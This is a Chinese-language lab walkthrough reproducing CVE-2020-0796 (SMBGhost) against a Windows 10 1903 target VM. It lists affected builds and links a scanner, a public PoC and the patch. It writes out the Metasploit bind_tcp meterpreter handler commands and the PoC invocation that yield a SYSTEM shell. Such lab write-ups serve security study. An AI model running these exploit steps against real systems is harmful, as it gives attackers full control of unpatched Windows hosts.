SMB 3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,故也称永恒之黑。
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
使用exe版本(奇安信)检测
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
下载windows10靶机,直接拿shell(非蓝屏)版本会有限制,具体我使用的下面这个
ed2k://|file|cn_windows_10_consumer_editions_version_1903_updated_aug_2019_x64_dvd_4c9cbf0b.iso|5306406912|D061699FE76029369A7BEC3622A564BA|/
攻击机kali
靶机win10:192.168.188.177
安装好win10靶机关闭defender防火墙
运行漏洞检测工具,检测到漏洞
漏洞POC:https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796
payload正向监听,监听端口3333(POC默认端口)
kali终端msf执行
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 3333
set rhost 192.168.188.177
kali打开新终端执行POC
python3 exploit.py -ip win10IP
成功getshell且为system权限
设置内存2G,4G都可getshell,未出现蓝屏
内存1G时,出现蓝屏侧面佐证了其原理有关内存
更新windows,安装官方补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796